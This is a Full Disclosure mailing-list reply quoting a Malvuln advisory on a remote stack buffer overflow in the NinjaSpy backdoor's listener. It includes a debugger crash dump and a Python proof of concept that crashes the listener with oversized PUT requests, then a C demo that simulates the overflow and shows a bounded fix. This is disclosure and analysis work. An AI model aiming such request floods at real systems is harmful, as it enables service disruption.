Message-Id: <79AE58BB-2C89-499A-B60F-731B7076C827@gmail.com>
Date: Fri, 8 Jan 2021 07:53:44 -0800
From: Matthew Fernandez <matthew.fernandez@...il.com>
To: malvuln <malvuln13@...il.com>
Cc: fulldisclosure@...lists.org
Subject: Re: [FD] Backdoor.Win32.NinjaSpy.c / Remote Stack Buffer Overflow
How should we be treating the stream of malware vulnerabilities you’ve reported recently? If something is malware, surely I want to remove it from my machine anyway? I’m all for full disclosure, but I’m just trying to understand if there’s anything actionable list members could do with this information. Thank you for your work on this, which is quite interesting to follow by the way.
> On Jan 7, 2021, at 20:41, malvuln <malvuln13@...il.com> wrote:
>
> Discovery / credits: malvuln - Malvuln.com (c) 2021
> Original source:
> https://malvuln.com/advisory/6eece319bc108576bd1f4a8364616264.txt
> Contact: malvuln13@...il.com
> Media: twitter.com/malvuln
>
> Threat: Backdoor.Win32.NinjaSpy.c
> Vulnerability: Remote Stack Buffer Overflow
> Description: The specimen drops a DLL named "cmd.dll" under C:\WINDOWS\
> which listens on both TCP ports 2003 and 2004. By sending consecutive HTTP
> PUT requests with a large payload of characters we can cause a buffer overflow.
>
> Type: PE32
> MD5: 6eece319bc108576bd1f4a8364616264
> Vuln ID: MVID-2021-0018
> Dropped files: cmd.dll
> ASLR: False
> DEP: False
> Safe SEH: True
> Disclosure: 01/08/2021
>
> Memory Dump:
> 0:000> .ecxr
> eax=41414141 ebx=41414141 ecx=03fe0ea2 edx=0019eb08 esi=0420986c edi=03fe0e9d
> eip=00440f57 esp=0019eae0 ebp=0019eb18 iopl=0         nv up ei pl nz na po nc
> cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00210202
> cmd+0x40f57:
> 00440f57 83bb8001000000  cmp     dword ptr [ebx+180h],0 ds:002b:414142c1=????????
>
> FAULTING_IP:
> cmd+40f57
> 00440f57 83bb8001000000 cmp dword ptr [ebx+180h],0
>
> EXCEPTION_RECORD: ffffffff -- (.exr 0xffffffffffffffff)
> ExceptionAddress: 00440f57 (cmd+0x00040f57)
> ExceptionCode: c0000005 (Access violation)
> ExceptionFlags: 00000000
> NumberParameters: 2
> Parameter[0]: 00000000
> Parameter[1]: 414142c1
> Attempt to read from address 414142c1
>
> PROCESS_NAME: cmd.dll
>
> OVERLAPPED_MODULE: Address regions for 'jscript9' and 'resourcepolicyclient.dll' overlap
>
> ERROR_CODE: (NTSTATUS) 0xc0000005 - The instruction at 0x%p referenced memory at 0x%p. The memory could not be %s.
>
> EXCEPTION_CODE: (NTSTATUS) 0xc0000005 - The instruction at 0x%p referenced memory at 0x%p. The memory could not be %s.
>
> EXCEPTION_PARAMETER1: 00000000
>
> EXCEPTION_PARAMETER2: 414142c1
>
> READ_ADDRESS: 414142c1
>
> FOLLOWUP_IP:
> cmd+40f57
> 00440f57 83bb8001000000 cmp dword ptr [ebx+180h],0
>
> MOD_LIST: <ANALYSIS/>
>
> NTGLOBALFLAG: 0
>
> APPLICATION_VERIFIER_FLAGS: 0
>
> FAULTING_THREAD: 000014f4
>
> BUGCHECK_STR: APPLICATION_FAULT_INVALID_POINTER_READ_FILL_PATTERN_41414141
>
> PRIMARY_PROBLEM_CLASS: INVALID_POINTER_READ_FILL_PATTERN_41414141
>
> DEFAULT_BUCKET_ID: INVALID_POINTER_READ_FILL_PATTERN_41414141
>
> LAST_CONTROL_TRANSFER: from 764ee0bb to 00440f57
>
> STACK_TEXT:
> WARNING: Stack unwind information not available. Following frames may be wrong.
> 0019eb18 764ee0bb 00920602 00000046 00000000 cmd+0x40f57
> 0019eb44 764f8849 03fe0e9d 00920602 00000046 user32!_InternalCallWinProc+0x2b
> 0019eb68 764fb145 00000046 00000000 0019ed14 user32!InternalCallWinProc+0x20
> 0019ec38 764e8503 03fe0e9d 00000000 00000046 user32!UserCallWinProcCheckWow+0x1be
> 0019eca0 764dfbfa 02c1f600 00000000 00000046 user32!DispatchClientMessage+0x1b3
> 0019ece8 773d0bcd 0019ed04 00000038 0019ee20 user32!__fnINOUTLPWINDOWPOS+0x4a
> 0019ed38 76832eec 76521878 000f0a14 76521760 ntdll!KiUserCallbackDispatcher+0x4d
> 0019ed3c 76521878 000f0a14 76521760 0055060a win32u!NtUserSetFocus+0xc
> 0019ed5c 764ee0bb 0055060a 00000110 000f0a14 user32!MB_DlgProc+0x118
> 0019ed88 764f8849 76521760 0055060a 00000110 user32!_InternalCallWinProc+0x2b
> 0019edac 764fac8c 00000110 000f0a14 0019f3e8 user32!InternalCallWinProc+0x20
> 0019ee30 764dbf65 0055060a 00000110 000f0a14 user32!UserCallDlgProcCheckWow+0x10f
> 0019ee8c 764dbe45 02c49f90 00000000 00000110 user32!DefDlgProcWorker+0x115
> 0019eeac 764ee0bb 0055060a 00000110 000f0a14 user32!DefDlgProcW+0x25
> 0019eed8 764f8849 764dbe20 0055060a 00000110 user32!_InternalCallWinProc+0x2b
> 0019eefc 764fb145 00000110 000f0a14 0019f3e8 user32!InternalCallWinProc+0x20
> 0019efcc 764fa89c 7a4afc30 00007ffe 00000110 user32!UserCallWinProcCheckWow+0x1be
> 0019f038 76505b67 02c49f90 00000000 0019f3e8 user32!SendMessageWorker+0x6ff
> 0019f154 76506533 764d0000 0267a708 00000000 user32!InternalCreateDialog+0x1137
> 0019f198 7654043b 00e80416 76521760 0019f3e8 user32!InternalDialogBox+0xc8
> 0019f264 768339ec 0019f3d0 76522093 0019f3e8 user32!SoftModalMessageBox+0x72b
> 0019f26c 76522093 0019f3e8 07c43d40 00000000 win32u!NtUserModifyUserStartupInfoFlags+0xc
> 0019f4ac 0045a743 00e80416 04229764 041f562c user32!MessageBoxWorker+0x29a
> 0019f530 0045a85a 00000010 0019fd34 0045a87b cmd+0x5a743
> 0019f658 0045a63f 00000000 004aa4e0 0045e01d cmd+0x5a85a
> 0019fd50 00420446 00000401 0000036c 00000008 cmd+0x5a63f
> 0019fd68 764ee0bb 005b0464 00000401 0000036c cmd+0x20446
> 0019fd94 764f8849 03fe0f05 005b0464 00000401 user32!_InternalCallWinProc+0x2b
> 0019fdb8 764fb145 00000401 0000036c 00000008 user32!InternalCallWinProc+0x20
> 0019fe88 764e90dc 03fe0f05 00000000 00000401 user32!UserCallWinProcCheckWow+0x1be
> 0019fef4 764e38c0 0019ff68 0045a30c 0019ff1c user32!DispatchMessageWorker+0x4ac
> 0019fefc 0045a30c 0019ff1c 0019ff00 004ce046 user32!DispatchMessageA+0x10
> 0019ff68 004a992c e046004c 0019ffcc 00404498 cmd+0x5a30c
> 0019ff80 76e38654 002d2000 76e38630 6a961c86 cmd+0xa992c
> 0019ff94 773c4a77 002d2000 8aaf072f 00000000 kernel32!BaseThreadInitThunk+0x24
> 0019ffdc 773c4a47 ffffffff 773e9eda 00000000 ntdll!__RtlUserThreadStart+0x2f
> 0019ffec 00000000 004ce046 002d2000 00000000 ntdll!_RtlUserThreadStart+0x1b
>
>
> STACK_COMMAND: ~0s; .ecxr ; kb
>
> SYMBOL_STACK_INDEX: 0
>
> SYMBOL_NAME: cmd+40f57
>
> FOLLOWUP_NAME: MachineOwner
>
> MODULE_NAME: cmd
>
> IMAGE_NAME: cmd.dll
>
> DEBUG_FLR_IMAGE_TIMESTAMP: 2a425e19
>
> FAILURE_BUCKET_ID: INVALID_POINTER_READ_FILL_PATTERN_41414141_c0000005_cmd.dll!Unknown
>
> BUCKET_ID: APPLICATION_FAULT_INVALID_POINTER_READ_FILL_PATTERN_41414141_cmd+40f57
>
>
> Exploit/PoC:
> import socket
> import sys
>
> MALWARE_HOST = "x.x.x.x"   # host running the NinjaSpy cmd.dll listener
> PORT = 2004
> c = 1
> JUNK = "A" * 8601
> AMT = 10
> # Oversized request-target plus an oversized Accept-Charset header;
> # encoded to bytes so it can be sent from Python 3.
> PAYLOAD = ("PUT /" + JUNK + " HTTP/1.0 Content-Type: "
>            "application/x-www-form-urlencoded Content-Length: dkKoybHost: 35409\r\n"
>            "Accept-Charset: " + JUNK).encode()
>
>
> def doit():
>     global c
>     # One oversized PUT per connection; the listener falls over after
>     # several consecutive requests.
>     while True:
>         s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
>         s.connect((MALWARE_HOST, PORT))
>         s.sendall(PAYLOAD)
>         s.close()
>         c += 1
>         if c == AMT:
>             print("Backdoor.Win32.NinjaSpy.c / Remote Stack Buffer Overflow")
>             print("MD5: 6eece319bc108576bd1f4a8364616264")
>             print("By Malvuln")
>             sys.exit()
>
>
> if __name__ == "__main__":
>     doit()
>
>
>
> Disclaimer: The information contained within this advisory is supplied
> "as-is" with no warranties or guarantees of fitness of use or otherwise.
> Permission is hereby granted for the redistribution of this advisory,
> provided that it is not altered except by reformatting it, and that due
> credit is given. Permission is explicitly given for insertion in
> vulnerability databases and similar, provided that due credit is given to
> the author. The author is not responsible for any misuse of the information
> contained herein and accepts no responsibility for any damage caused by the
> use or misuse of this information. The author prohibits any malicious use
> of security related information or exploits by the author or elsewhere. Do
> not attempt to download Malware samples. The author of this website takes
> no responsibility for any kind of damages occurring from improper Malware
> handling or the downloading of ANY Malware mentioned on this website or
> elsewhere. All content Copyright (c) Malvuln.com (TM).
>
> _______________________________________________
> Sent through the Full Disclosure mailing list
> https://nmap.org/mailman/listinfo/fulldisclosure
> Web Archives & RSS: http://seclists.org/fulldisclosure/
_______________________________________________
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/
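The crash in the quoted advisory (EBX holding the 0x41414141 fill pattern, then a read fault at [ebx+180h], i.e. 0x414142c1) is the signature of a pointer saved on the stack being clobbered before it is dereferenced; it is not yet a demonstration of EIP control. The C program below is an added example, not code from the advisory, from the specimen or from Malvuln. It assumes a hypothetical frame layout (a 64-byte request-target buffer followed by a 32-bit pointer slot that the handler reads at offset 0x180; the real cmd.dll layout is unknown), a constructed PUT request of the PoC's size, and an arbitrary starting pointer value of 0x03fe0e9d. It reproduces the observed pattern with an unbounded copy and shows a bounded copy that rejects the oversize target instead.

```c
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

/* Assumed frame layout for this demo (not recovered from cmd.dll): a fixed
 * copy of the request-target followed by a 32-bit pointer slot that the
 * handler later dereferences at +0x180, matching the quoted crash
 * ("cmp dword ptr [ebx+180h],0" with ebx=41414141). */
#define PATH_CAP  64u
#define FIELD_OFF 0x180u

struct handler_frame {
    char     path[PATH_CAP];
    uint32_t sess_ptr;   /* clobbered by the overflow in vuln_handle() */
};

/* Locate the request-target of "METHOD /target HTTP/1.0 ...": sets *len and
 * returns its start, or NULL when the line has no method separator. */
static const char *request_target(const char *req, size_t *len)
{
    const char *sp = strchr(req, ' ');
    if (sp == NULL) return NULL;
    const char *start = sp + 1;
    const char *end = strchr(start, ' ');
    if (end == NULL) end = start + strlen(start);
    *len = (size_t)(end - start);
    return start;
}

/* Build "PUT /AAA...A HTTP/1.0\r\n" with `junk` A's, the shape the PoC sends.
 * Constructed input, not captured traffic. Caller frees the result. */
static char *build_put(size_t junk)
{
    static const char head[] = "PUT /", tail[] = " HTTP/1.0\r\n";
    size_t hlen = sizeof head - 1, tlen = sizeof tail - 1;
    char *req = malloc(hlen + junk + tlen + 1);
    if (req == NULL) return NULL;
    memcpy(req, head, hlen);
    memset(req + hlen, 'A', junk);
    memcpy(req + hlen + junk, tail, tlen + 1);   /* copies the NUL too */
    return req;
}

/* Vulnerable handler: copies the target with no bound, so bytes past path[]
 * land in sess_ptr. The copy goes through a byte pointer to the whole frame
 * (path[] is at offset 0) and is capped at sizeof(frame) only so the demo
 * stays inside one object instead of smashing the real stack.
 * Returns the pointer value the handler would later load into EBX. */
static uint32_t vuln_handle(const char *req)
{
    struct handler_frame f;
    size_t len;
    f.sess_ptr = 0x03fe0e9du;            /* assumed valid pointer before the copy */
    const char *t = request_target(req, &len);
    if (t == NULL) return f.sess_ptr;
    if (len > sizeof f) len = sizeof f;
    memcpy((char *)&f, t, len);          /* the overflow */
    return f.sess_ptr;
}

/* Hardened handler: reject a target that does not fit with its NUL.
 * Returns 0 when accepted, -1 when rejected; nothing past out[] is written. */
static int safe_handle(const char *req, char out[PATH_CAP])
{
    size_t len;
    const char *t = request_target(req, &len);
    if (t == NULL || len >= PATH_CAP) return -1;
    memcpy(out, t, len);
    out[len] = '\0';
    return 0;
}

/* Address the clobbered pointer is dereferenced at: sess_ptr + 0x180. */
static uint32_t fault_address(uint32_t sess_ptr) { return sess_ptr + FIELD_OFF; }

/* Run each handler on a request with `junk` A's in the target. */
static uint32_t overflow_demo(size_t junk)
{
    char *req = build_put(junk);
    if (req == NULL) return 0;
    uint32_t p = vuln_handle(req);
    free(req);
    return p;
}

static int hardened_demo(size_t junk)
{
    char out[PATH_CAP];
    char *req = build_put(junk);
    if (req == NULL) return -1;
    int rc = safe_handle(req, out);
    free(req);
    return rc;
}

int main(void)
{
    uint32_t ebx = overflow_demo(8601);   /* same JUNK size as the PoC */
    printf("vulnerable: sess_ptr=%08x, next read at %08x\n", ebx, fault_address(ebx));
    printf("hardened:   %s\n", hardened_demo(8601) == 0 ? "accepted" : "rejected oversize target");
    return 0;
}
```

With the PoC's 8601-byte target the unbounded copy leaves sess_ptr at 0x41414141 and the next field access lands at 0x414142c1, the same read address the quoted dump reports; the bounded copy returns -1 for that request and 0 for a short one. The practical takeaway for triage is that a fill-pattern read fault like this proves memory corruption past the buffer but says nothing yet about whether a return address or SEH record is reachable, so "remote stack buffer overflow" should be read as a crash, not a proven code-execution primitive, until the distance to a control-flow slot is measured.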